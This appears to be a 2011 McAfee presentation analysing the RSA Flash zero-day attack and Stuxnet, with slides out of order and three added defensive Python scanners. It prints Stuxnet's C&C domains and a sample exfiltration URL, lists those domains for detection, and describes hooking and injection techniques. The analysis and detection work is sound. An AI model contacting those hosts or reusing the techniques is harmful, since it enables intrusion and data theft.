RSA was hacked in March 2011 using an Adobe Flash vulnerability. CVE-2011-0609 was discovered as a zero-day in March 2011. The carrier Flash file was embedded inside an Excel file. When the Excel file is opened on a machine with a vulnerable version of Flash Player, the exploit is triggered: it loads shellcode into memory, performs heap spraying, and loads a Flash byte stream from memory to exploit the vulnerability. Once the exploit succeeds, a backdoor (Poison Ivy) is installed on the machine.
getproperty – Get the named property of the given target.
coerce – Convert a value to the type given by the name argument. This implements the ES4 implicit conversion.
• Discovered in July 2010 by the VirusBlokAda company in Minsk, Belarus
• Affecting 14 plants to date in Iran, Indonesia, India, UK, North America, Korea
• Targets Siemens WinCC and SIMATIC Process Control System (PCS7)
• Infection starts when a user opens a folder that contains the .lnk template files (.pif files are also vulnerable)
• Rootkit drivers signed with valid certificates (Realtek and JMicron)
• UPX packed, XOR encoded everywhere
• Once loaded, queries the Siemens database with a known default password
• Connects to C&C servers, sending sensitive data
• Manipulates the database to control the HMI output and manipulates the PLCs
Uses four 0-day vulnerabilities plus the Conficker vulnerability (MS08-067):
• Shortcut icon vulnerability (CVE-2010-2568/MS10-046) – affecting every version of Windows since Windows 2000 (even Win95) (patched Aug. 2)
• Design flaw in Print Spooler (MS10-061/CVE-2010-2729) (patched on Tuesday)
• Two privilege escalation exploits [win32k.sys] (yet to be patched)
• Decrypt the configuration data used by the threat
• Drop two .sys files and install them as a kernel-level rootkit
• Access files created by the Siemens Step 7 software package
• Update itself
• Drop more .dll and .dat files
• Infect removable drives with custom .lnk files
• Inject into the lsass.exe process and execute custom code
• Inject into the iexplore.exe process
• Check if certain antivirus applications are running
• Scan the network for servers
• Remove itself
• Communicate with the C&C server
Advanced Persistent Threats: Reality or Myth
October 20, 2011
Advanced Persistent Threats – Myth or Reality?
Rahul Mohandas, Research Manager, McAfee
Advanced Persistent Threats – Agenda
• Threat Landscape – Past, Present & Future
• Advanced Persistent Threats – The definition – Phases – Threat vectors – Associated costs
• Recent APT Attacks Demystified – RSA Hack & Adobe Flash zero-day – Stuxnet: A step closer to hardware
• Simulating a Real World Attack (DEMO)
The information in this presentation is provided only for educational purposes and for the convenience of McAfee customers. The information contained herein is subject to change without notice, and is provided "AS IS" without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance.
Advanced Persistent Threats – The definition
• Actors – STATE sponsored / activists / members of organized crime
• Motives – Economic & political gain
• Targets – IP-rich organizations
• Goals – Steal sensitive data, monitor communication or disrupt operations
January 2, 2012
Advanced Persistent Threats – Phases
• Step 1 – Reconnaissance
• Step 2 – Establish a backdoor
• Step 3 – Steal user credentials
• Step 4 – Data exfiltration
• Step 5 – Maintain persistence
Advanced Persistent Threats – Associated costs
• APTs are not focusing on costs or revenue.
• 0-day cost ~ $100k

  Vulnerability/Exploit     Value                   Source
  "Some exploits"           $200,000 - $250,000     Various industry sources
  A "real good" exploit     over $100,000           Official from SNOsoft research
  Vista exploit             $50,000                 Raimund Genes, Trend Micro
  "Weaponized exploit"      $20,000 - $30,000       David Maynor, SecureWorks

• APT cost – Stuxnet utilized four 0-day exploits. If you include the development and weaponization costs, the attack was worth well over half a million dollars.
RSA Hack & Adobe Flash zero-day
Advanced Persistent Threats – RSA attack
Advanced Persistent Threats – History of Flash exploits

  Detection        Description                                                      First Reported
  CVE-2007-0071    Vulnerability in DefineSceneAndFrameLabelData tag                June 2008
  CVE-2010-1297    Vulnerability in AVM2 New Function()                             June 2010
  CVE-2010-2884    Vulnerability in ActionScript Virtual Machine 2                  September 2010
  CVE-2010-3654    Vulnerability in AVM2 MultiName button class                     October 2010
  CVE-2011-0609    Vulnerability in AVM2 verifier while handling branch instructions  March 2011
  CVE-2011-0611    Vulnerability in AVM1 bytecode                                   July 2011
Advanced Persistent Threats – Signature evasion techniques
• public function loadBytes(bytes:ByteArray, context:LoaderContext = null):void
• Loads from binary data stored in a ByteArray object
• bytes:ByteArray — A ByteArray object. The contents of the ByteArray can be any of the file formats supported by the Loader class: SWF, GIF, JPEG, or PNG.
(Diagram: carrier file header, XOR key, XOR'ed Flash file – the SWF is stored XOR-encoded inside the carrier and decoded in memory before being passed to loadBytes)
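Because loadBytes() takes the SWF straight from a ByteArray, the carrier document never needs to contain the plaintext "FWS"/"CWS" signature, so a scanner that only looks for that signature misses it. The following scan is an added example, not code from the presentation or from McAfee: it undoes every single-byte XOR key over a blob and reports offsets where a plausible SWF header appears. The version and length sanity limits, the make_sample carrier and its marker string are assumptions constructed for the example.

```python
"""Brute-force single-byte XOR keys to find SWF headers hidden in a carrier file.

Added example, not from the presentation. A dropper that keeps its exploit SWF
XOR-encoded inside an Office document and decodes it only at runtime defeats a
scanner that merely searches for the 'FWS'/'CWS' signature; this scan tries
every single-byte key and reports where a plausible header lands.
"""
import struct
from collections import namedtuple

SWF_MAGICS = (b"FWS", b"CWS")  # uncompressed and zlib-compressed SWF signatures
Hit = namedtuple("Hit", "offset key magic version length")


def header_at(buf, off, key):
    """Return a Hit if buf[off:off+8] is a plausible decoded SWF header, else None."""
    if off + 8 > len(buf):
        return None
    version = buf[off + 3]
    (length,) = struct.unpack_from("<I", buf, off + 4)
    # Sanity limits (assumptions): SWF versions seen in the wild are small, and the
    # declared file length must at least cover the 8-byte header itself.
    if not 1 <= version <= 40 or length < 8:
        return None
    return Hit(off, key, buf[off:off + 3], version, length)


def find_xored_swf(data, keys=range(256)):
    """Try each single-byte key; key 0 reports plaintext headers. Hits sorted by offset."""
    hits = []
    for key in keys:
        table = bytes(i ^ key for i in range(256))   # XOR as a translation table
        decoded = data.translate(table)
        for magic in SWF_MAGICS:
            off = decoded.find(magic)
            while off != -1:
                hit = header_at(decoded, off, key)
                if hit:
                    hits.append(hit)
                off = decoded.find(magic, off + 1)
    return sorted(hits)


def make_sample(key):
    """Constructed carrier: filler, a marker string, then a fake SWF XOR-encoded with key."""
    body = b"\x00" * 24                                   # not a real SWF body
    swf = b"FWS" + bytes([10]) + struct.pack("<I", 8 + len(body)) + body
    encoded = bytes(b ^ key for b in swf)
    return b"\x00" * 16 + b"CONSTRUCTED-CARRIER" + encoded + b"\xff" * 8


if __name__ == "__main__":
    for hit in find_xored_swf(make_sample(0x5A)):
        print("offset %d key 0x%02x %s v%d len %d"
              % (hit.offset, hit.key, hit.magic.decode(), hit.version, hit.length))
```

On a real sample, feed the whole document to find_xored_swf() and treat any hit with a non-zero key as a strong indicator; the version/length check keeps random byte triples that happen to decode to "FWS" from being reported.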
Stuxnet – A step closer to the hardware
Advanced Persistent Threats – Stuxnet: overview
(Diagram)
• Initial delivery: online or via USB drive
• Propagation exploits FOUR new, unknown vulnerabilities
• Actual target: specific nuclear enrichment controllers (Siemens PLCs driving nuclear enrichment centrifuges)
Advanced Persistent Threats – Stuxnet: under the hood
(Diagram: the Stuxnet worm at the centre, surrounded by its components)
• Rootkit
• Anti-AV
• Covert
• Digital certificate
• Exploits – MS10-046, CVE-2010-2772, MS10-061, MS08-067, MS10-073, MS08-092
• Propagation – USB drives, P2P network
Advanced Persistent Threats – Stuxnet: working (cont.)
• When the folder is opened in Explorer.exe, the .lnk files exploit the 0-day vulnerability to silently load the first file, ~WTR4141.tmp (a DLL file), into memory and pass control to it (execute it) in the Explorer.exe address space
  – Once running, the worm's rootkit features hide all file names ending in *.lnk and starting with ~wtr (including the above files) by hooking the following APIs:
    • FindFirstFileW
    • FindNextFileW
    • FindFirstFileExW
    • NtQueryDirectoryFile
    • ZwQueryDirectoryFile
• Then it loads the second .tmp file, ~WTR4132.tmp (which is a .CPL file)
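Since the infection chain above starts with the .lnk files themselves, a useful triage step is to parse shortcuts found on removable media without letting the shell resolve them. The following reader is an added example, not code from the presentation or from McAfee. It follows the MS-SHLLINK layout (fixed 76-byte header, optional LinkTargetIDList and LinkInfo blocks, then the StringData fields) and applies a heuristic, assumed for the example, that flags an icon location which is neither an .ico/.exe file nor under the Windows directory. The build_lnk helper and every sample path it is given are constructed test inputs, not artefacts from the slides.

```python
"""Minimal Shell Link (.lnk) triage parser: read the StringData fields of a
shortcut (name, relative path, working dir, arguments, icon location) without
resolving it.

Added example, not from the presentation. Layout per MS-SHLLINK; the
suspicious_icon() heuristic and the constructed sample shortcuts are assumptions.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON = 0x04, 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80
# StringData fields appear in this fixed order, each only if its flag is set.
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]


def parse_lnk(data):
    """Return a dict with 'flags' and whichever StringData fields are present."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                   # end of the fixed ShellLinkHeader
    if flags & HAS_ID_LIST:                    # IDListSize (uint16) + item IDs
        (size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                  # LinkInfoSize (uint32) includes itself
        (size,) = struct.unpack_from("<I", data, pos)
        pos += size
    fields = {"flags": flags}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)   # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("latin-1")
            pos += count
    return fields


def suspicious_icon(fields):
    """Heuristic (assumption): an icon drawn from something other than an .ico/.exe,
    outside the Windows directory, deserves a closer look."""
    icon = fields.get("icon_location", "").lower()
    if not icon or icon.startswith(("c:\\windows\\", "%systemroot%", "%windir%")):
        return False
    return not icon.endswith((".ico", ".exe"))


def build_lnk(icon_location, name=None):
    """Construct a minimal Unicode .lnk carrying only an icon location (and optional name)."""
    flags = IS_UNICODE | HAS_ICON | (HAS_NAME if name else 0)
    header = struct.pack("<I16sII", 0x4C, LNK_CLSID, flags, 0)  # size, CLSID, flags, attrs
    header += b"\x00" * 24                                      # three FILETIMEs
    header += struct.pack("<IIIH", 0, 0, 1, 0)                  # size, icon idx, SW_SHOWNORMAL, hotkey
    header += b"\x00" * 10                                      # Reserved1/2/3
    assert len(header) == 76
    body = b""
    for text in ([name] if name else []) + [icon_location]:
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


if __name__ == "__main__":
    for path in ("E:\\~WTR4141.tmp", "C:\\Windows\\system32\\shell32.dll"):
        fields = parse_lnk(build_lnk(path, name="constructed sample"))
        print(path, "->", "SUSPICIOUS" if suspicious_icon(fields) else "ok")
```

Run it over shortcuts copied off a suspect USB stick with open(path, "rb").read(); the parser never touches the icon or target, which is the point of triaging the file statically.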
Advanced Persistent Threats – Stuxnet: MRxCls.sys & MRxNet.sys
MRxCls.sys (0xF8153747BAE8B4AE48837EE17172151E)
• Injects malicious code into existing processes (services.exe, svchost.exe, lsass.exe)
• Creates the HKLM\System\CurrentControlSet\Services\MRxCls registry key
MRxNet.sys (0xCC1DB5360109DE3B857654297D262CA1)
• Monitors system events and activities (i.e. new program loading; hides *.tmp files)
• Creates the HKLM\System\CurrentControlSet\Services\MRxNet registry key
Stuxnet – Command and Control (C&C/C2)
• Stuxnet attempts to access the following C&C servers:
  – www.mypremierfutbol.com
  – www.todaysfutbol.com
• The data is encrypted and sent:
  – http://mypremierfutbol.com/index.php?data=66a96e2888c9bb53f503e334d5d775e99b7905ac6e541529e2dadd4640fa3f995391d36ff2a7c058a21d699d2fb4a875ec1ce7a0f9e7dd11b6bfa1fe5377d602c39621b7f329
• The malware uses the RPC protocol for requesting a service from the client (compromised machine) over the network.
• The following actions may be executed in response to RPC calls:
  – create process, terminate process, read file, write file, delete file, set file attribute, inject file into a system process
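The beacon on this slide has two observable properties a proxy log reveals: the destination is one of the two named domains, and the request carries a long hex-encoded data parameter to index.php. The scanner below is an added example, not code from the presentation or from McAfee; it parses a constructed proxy log format (timestamp, client IP, method, URL, status), matches hosts against the slide's two domains with or without the www. label, and separately flags any long hex data parameter, so a beacon to a not-yet-known domain still surfaces. The log lines, the 64-character threshold and the example hex payloads are constructed assumptions.

```python
"""Flag proxy log entries that match the Stuxnet C&C beacon pattern from the slide.

Added example, not from the presentation. The log format, the hex-length
threshold and the sample lines are constructed for the example; adapt LOG_LINE
to your proxy's real format.
"""
import re
from urllib.parse import urlsplit, parse_qs

C2_DOMAINS = {"mypremierfutbol.com", "todaysfutbol.com"}   # domains named on the slide
HEX_BLOB = re.compile(r"^[0-9a-fA-F]+$")
MIN_HEX_LEN = 64   # assumption: the slide's sample 'data' value is far longer than this

LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def normalize_host(host):
    """Lower-case, strip a trailing dot and a leading 'www.' so both slide forms match."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def classify_request(url):
    """Return the list of reasons a URL looks like the beacon (empty list = clean)."""
    parts = urlsplit(url)
    reasons = []
    host = normalize_host(parts.hostname or "")
    if host in C2_DOMAINS:
        reasons.append("known C2 domain: " + host)
    for value in parse_qs(parts.query).get("data", []):
        if len(value) >= MIN_HEX_LEN and HEX_BLOB.match(value):
            reasons.append("long hex 'data' parameter (%d chars) on %s" % (len(value), parts.path))
    return reasons


def scan_log(lines):
    """Parse proxy lines; return (client, url, reasons) for every line that matches."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue            # malformed line; a real deployment would count these
        reasons = classify_request(m.group("url"))
        if reasons:
            hits.append((m.group("client"), m.group("url"), reasons))
    return hits


# Constructed sample log: one full beacon, one benign request, one bare C2 domain
# hit, one long hex blob to an unknown host, and one malformed line.
SAMPLE_LOG = [
    "2011-10-20T09:12:01Z 10.1.2.3 GET http://www.mypremierfutbol.com/index.php?data=" + "ab" * 48 + " 200",
    "2011-10-20T09:12:05Z 10.1.2.3 GET http://www.example.org/index.php?data=short 200",
    "2011-10-20T09:12:09Z 10.1.2.7 GET http://todaysfutbol.com/ 404",
    "2011-10-20T09:12:12Z 10.1.2.9 GET http://updates.example.net/index.php?data=" + "cd" * 40 + " 200",
    "this line is not in the expected format",
]

if __name__ == "__main__":
    for client, url, reasons in scan_log(SAMPLE_LOG):
        print(client, url[:60], "|", "; ".join(reasons))
```

The domain match alone is the high-confidence signal; the hex-parameter rule is deliberately looser and is meant to be reviewed, not blocked on, since legitimate sites also pass hex tokens in query strings.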
Simulating a Real World Attack (DEMO)